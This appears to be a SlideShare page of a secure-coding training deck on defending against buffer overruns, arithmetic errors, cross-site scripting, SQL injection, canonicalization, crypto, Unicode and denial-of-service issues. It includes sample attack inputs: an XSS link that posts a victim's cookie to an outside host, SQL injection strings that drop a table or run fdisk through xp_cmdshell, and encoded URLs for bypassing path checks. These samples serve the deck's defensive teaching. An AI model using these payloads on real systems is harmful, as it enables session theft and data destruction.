Writing Secure Code – Threat Defense

4,086 views

Published on

Writing Secure Code – Threat Defense

Published in: Technology, Education
2 Comments
8 Likes
Statistics
Notes
No Downloads
Views
Total views
4,086
On SlideShare
0
From Embeds
0
Number of Embeds
109
Actions
Shares
0
Downloads
0
Comments
2
Likes
8
Embeds 0
No embeds

No notes for slide
  • Writing Secure Code – Threat Defense

    1. 1. Writing Secure Code – Threat Defense
    2. 2. What We Will Cover <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-Site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    3. 3. Session Prerequisites <ul><li>Development experience with Microsoft® Visual Basic®, Microsoft Visual C++®, or C# </li></ul>Level 200
    4. 4. Agenda <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    5. 5. The Need for Secure Code “ US port 'hit by UK hacker’” “ Several corporations said they lost $10 million in a single break-in ” “ Up to 1,500 Web sites could have been affected by a recent hacker attack” “ Piracy cost more than 4,300 jobs and $850 million in damage ” “ Sobig virus accounted for $30 billion worth of economic damages worldwide ” “ Attacks will cost the world economy a whopping $1.6 trillion (US$) this year”
    6. 6. Threat Scenarios <ul><li>Employees connecting to company’s network </li></ul><ul><ul><li>Wired, wireless, dial-up, VPN </li></ul></ul><ul><ul><li>Company PCs, personally-owned systems </li></ul></ul><ul><li>Employees connecting to other networks </li></ul><ul><ul><li>Internet hotspots, partner networks, broadband </li></ul></ul><ul><li>Partners connecting to company’s network </li></ul><ul><ul><li>Local vs. federated authentication </li></ul></ul><ul><ul><li>Anonymous guests </li></ul></ul><ul><li>New scenarios and new threats </li></ul>
    7. 7. Potential Attackers <ul><li>Thieves </li></ul><ul><li>Confidence tricksters </li></ul><ul><li>Vandals </li></ul><ul><li>Criminals </li></ul><ul><li>Hackers </li></ul><ul><li>It should be no surprise that attacks occur! </li></ul>
    8. 8. Common Types of Attack Connection Fails Organizational Attacks Restricted Data Accidental Breaches in Security Automated Attacks Hackers Viruses, Trojan Horses, and Worms Denial of Service (DoS) DoS
    9. 9. Agenda <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    10. 10. What Is a Buffer Overrun? <ul><li>Occurs when data exceeds the expected size and overwrites other values </li></ul><ul><li>Exists primarily in unmanaged C/C++ code </li></ul><ul><li>Includes four types: </li></ul><ul><ul><li>Stack-based buffer overruns </li></ul></ul><ul><ul><li>Heap overruns </li></ul></ul><ul><ul><li>V-table and function pointer overwrites </li></ul></ul><ul><ul><li>Exception handler overwrites </li></ul></ul><ul><li>Can be exploited by worms </li></ul>
    11. 11. Possible Results of Buffer Overruns <ul><li>To perform denial of service attacks against servers </li></ul>Access violation Hacker’s Goal Possible Result <ul><li>To gain privileges for their own code </li></ul><ul><li>To exploit vital business data </li></ul><ul><li>To perform destructive actions </li></ul>Code Injection <ul><li>To disrupt the normal operation of software </li></ul>Instability
    12. 12. Stack-Based Buffer Overrun Example Top of Stack char[4] int Return address void UnSafe (const char* uncheckedData) { int anotherLocalVariable; strcpy (localVariable, uncheckedData); } char localVariable[4];
    13. 13. Heap Overruns <ul><li>Overwrite data stored on the heap </li></ul><ul><li>Are harder to exploit than a buffer overrun </li></ul>strcpy xxxxxxx xxxxxxx Data Pointer Data Data Pointer Pointer
    14. 14. Defending Against Buffer Overruns (1 of 2) <ul><li>Be very cautious when using: </li></ul><ul><ul><li>strcpy </li></ul></ul><ul><ul><li>strncpy </li></ul></ul><ul><ul><li>CopyMemory </li></ul></ul><ul><ul><li>MultiByteToWideChar </li></ul></ul><ul><li>Use the /GS compile option in Visual C++ to spot buffer overruns </li></ul><ul><li>Use strsafe.h for safer buffer handling </li></ul>
    15. 15. Defending Against Buffer Overruns (2 of 2) <ul><li>Check all array indexes </li></ul><ul><li>Use existing wrapper classes for safe array handling </li></ul><ul><li>Check file path lengths using _MAX_PATH </li></ul><ul><li>Use recognized file path processing methods, such as splitpath </li></ul><ul><li>Use managed code, but pay attention to PInvoke and COM Interop </li></ul>
    16. 16. Agenda <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    17. 17. Arithmetic Errors <ul><li>Occur when the limitations of a variable are exceeded </li></ul><ul><li>Lead to serious runtime issues </li></ul><ul><li>Are often overlooked and underestimated </li></ul><ul><li>Include: </li></ul><ul><ul><li>Overflow – value too large for data type </li></ul></ul><ul><ul><li>Underflow – value too small for data type </li></ul></ul>
    18. 18. Defending Against Arithmetic Errors <ul><li>Be conscious of the limitations of your chosen data types </li></ul><ul><li>Write defensive code that checks for overflows </li></ul><ul><li>Consider writing safe, reusable functions </li></ul><ul><li>Consider using a safe template class (if coding in C++) </li></ul>
    19. 19. Agenda <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-Site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    20. 20. What Is Cross-Site Scripting? <ul><li>A technique that allows hackers to: </li></ul><ul><ul><li>Execute malicious script in a client’s Web browser </li></ul></ul><ul><ul><li>Insert <script>, <object>, <applet>, <form>, and <embed> tags </li></ul></ul><ul><ul><li>Steal Web session information and authentication cookies </li></ul></ul><ul><ul><li>Access the client computer </li></ul></ul>Any Web page that renders HTML containing user input is vulnerable
    21. 21. Two Common Exploits of Cross-Site Scripting <ul><li>Attacking Web-based e-mail platforms and discussion boards </li></ul><ul><li>Using HTML <form> tags to redirect private information </li></ul>
    22. 22. Form-Based Attacks (1 of 2) Response.Write(&quot;Welcome&quot; & Request.QueryString(&quot;UserName&quot;))
    23. 23. Form-Based Attacks (2 of 2) <a href=http://www.contoso.msft/welcome.asp?name= <FORM action=http://www. nwtraders.msft/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT> > here </a>
    24. 24. Defending Against Cross-Site Scripting Attacks <ul><li>Do not: </li></ul><ul><ul><li>Trust user input </li></ul></ul><ul><ul><li>Echo Web-based user input unless you have validated it </li></ul></ul><ul><ul><li>Store secret information in cookies </li></ul></ul><ul><li>Do: </li></ul><ul><ul><li>Use the HttpOnly cookie option </li></ul></ul><ul><ul><li>Use the <frame> security attribute </li></ul></ul><ul><ul><li>Take advantage of ASP.NET features </li></ul></ul>
    25. 25. Agenda <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    26. 26. What is SQL Injection? <ul><li>SQL injection is: </li></ul><ul><ul><li>The process of adding SQL statements in user input </li></ul></ul><ul><ul><li>Used by hackers to: </li></ul></ul><ul><ul><ul><li>Probe databases </li></ul></ul></ul><ul><ul><ul><li>Bypass authorization </li></ul></ul></ul><ul><ul><ul><li>Execute multiple SQL statements </li></ul></ul></ul><ul><ul><ul><li>Call built-in stored procedures </li></ul></ul></ul>
    27. 27. Examples of SQL Injection <ul><li>If the ID variable is read directly from a Web form or Windows form textbox, the user could enter any of the following: </li></ul><ul><ul><li>ALFKI1001 </li></ul></ul><ul><ul><li>ALFKI1001' or 1=1 -- </li></ul></ul><ul><ul><li>ALFKI1001' DROP TABLE OrderDetail -- </li></ul></ul><ul><ul><li>ALFKI1001' exec xp_cmdshell('fdisk.exe') -- </li></ul></ul>sqlString = &quot;SELECT HasShipped FROM&quot; + &quot; OrderDetail WHERE OrderID ='&quot; + ID + &quot;'&quot;;
    28. 28. Defending Against SQL Injection <ul><li>Sanitize all input </li></ul><ul><ul><li>Consider all input as harmful until proven otherwise </li></ul></ul><ul><ul><li>Look for valid data and reject everything else </li></ul></ul><ul><ul><li>Consider the use of regular expressions to remove unwanted characters </li></ul></ul><ul><li>Run with least privilege </li></ul><ul><ul><li>Never execute as “sa” </li></ul></ul><ul><ul><li>Restrict access to built-in stored procedures </li></ul></ul><ul><li>Use stored procedures or SQL parameterized queries to access data </li></ul><ul><li>Do not echo ODBC errors </li></ul>
    29. 29. Agenda <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    30. 30. Canonicalization Issues <ul><li>There is usually more than one way to name something </li></ul><ul><li>Alternate representations exist for: </li></ul><ul><ul><li>File names </li></ul></ul><ul><ul><li>URLs </li></ul></ul><ul><ul><li>Devices (such as printers) </li></ul></ul><ul><li>Hackers may exploit code that makes decisions based on file names or URLs </li></ul>
    31. 31. Canonicalization Issues Example 1 – File Names <ul><li>MyLongFile.txt </li></ul><ul><li>MyLongFile.txt. </li></ul><ul><li>MyLong~1.txt </li></ul><ul><li>MyLongFile.txt::$DATA </li></ul>
    32. 32. <ul><li>There are many ways to represent characters on the Internet </li></ul>Canonicalization Issues Example 2 – Character Representation http://www.microsoft.com/technet/security Is the same as - http://www %2e microsoft %2 ecom %2f technet %2f security http://www.microsoft.com %c0%af technet %c0%af security http://www %25%32%65 microsoft.com/technet/security http://172.43.122.12 = http://2888530444
    33. 33. Defending Against Canonicalization Issues <ul><li>Use file system security to restrict access to private data </li></ul><ul><li>Never make a decision based on a name </li></ul><ul><li>Disable the IIS Parent Paths setting </li></ul>
    34. 34. Agenda <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    35. 35. Cryptography Weaknesses <ul><li>Inappropriate use of algorithms </li></ul><ul><ul><li>Creating your own </li></ul></ul><ul><ul><li>Using weak ones </li></ul></ul><ul><ul><li>Incorrect application </li></ul></ul><ul><li>Failure to keep keys secure </li></ul><ul><ul><li>Insecure storage </li></ul></ul><ul><ul><li>Extensive duration of use </li></ul></ul><ul><li>The human factor </li></ul>I need three of the above to decrypt your data! Key Plaintext Ciphertext Algorithm
    36. 36. Defending Against Cryptography Weaknesses <ul><li>Recycle keys periodically </li></ul><ul><li>Use ACLs to restrict access to keys </li></ul><ul><li>Store keys on an external device </li></ul><ul><li>Use SACLs to monitor activities </li></ul><ul><li>Use larger keys to provide increased security </li></ul><ul><li>Use DPAPI to simplify key management, if possible </li></ul><ul><li>Do not implement your own cryptographic routines </li></ul>
    37. 37. Agenda <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    38. 38. Unicode Issues <ul><li>Common mistakes </li></ul><ul><ul><li>Treating a Unicode character as a single byte </li></ul></ul><ul><ul><li>Miscalculating required buffer size </li></ul></ul><ul><ul><li>Misusing MultiByteToWideChar </li></ul></ul><ul><ul><li>Validating data before conversion, but not afterwards </li></ul></ul><ul><li>Results </li></ul><ul><ul><li>Buffer overruns </li></ul></ul><ul><ul><li>Potentially dangerous character sequences slipping through your validation routines </li></ul></ul>
    39. 39. Defending Against Unicode Issues <ul><li>Calculate buffer sizes using sizeof (WCHAR) </li></ul><ul><li>Be aware of GB18030 standards (4 bytes per character) </li></ul><ul><li>Convert from Unicode to ASCII and then validate </li></ul><ul><li>Use IsNLSDefinedString during validation </li></ul><ul><li>Use MultiByteToWideChar correctly to provide a sufficient buffer </li></ul>
    40. 40. Agenda <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    41. 41. Denial of Service Attacks <ul><li>CPU starvation </li></ul><ul><li>Memory starvation </li></ul><ul><li>Resource starvation </li></ul><ul><li>Network starvation </li></ul>
    42. 42. Defending Against Denial of Service Attacks <ul><li>Consider security as a design feature </li></ul><ul><li>Distrust user input </li></ul><ul><li>Fail intelligently </li></ul><ul><li>Test security </li></ul>
    43. 43. Session Summary <ul><li>The Need For Secure Code </li></ul><ul><li>Defending Against Memory Issues </li></ul><ul><li>Defending Against Arithmetic Errors </li></ul><ul><li>Defending Against Cross-site Scripting </li></ul><ul><li>Defending Against SQL Injection </li></ul><ul><li>Defending Against Canonicalization Issues </li></ul><ul><li>Defending Against Cryptography Weaknesses </li></ul><ul><li>Defending Against Unicode Issues </li></ul><ul><li>Defending Against Denial of Service </li></ul>
    44. 44. Next Steps <ul><ul><li>Stay informed and Sign up for security bulletins. </li></ul></ul><ul><ul><li>Get the latest Microsoft security guidance. </li></ul></ul><ul><ul><li>Get further Security Training. </li></ul></ul><ul><ul><li>Get expert help with a Microsoft® Certified Partner. </li></ul></ul><ul><ul><li>Microsoft Security Site (all audiences) </li></ul></ul><ul><ul><li>http://www.microsoft.com/uk/security </li></ul></ul><ul><li>TechNet Security Site (IT professionals) </li></ul><ul><ul><li>http://www.microsoft.com/uk/technet/ </li></ul></ul><ul><li>MSDN Security Site (developers) </li></ul><ul><ul><li>http://www.microsoft.com/uk/msdn/ </li></ul></ul>

    ×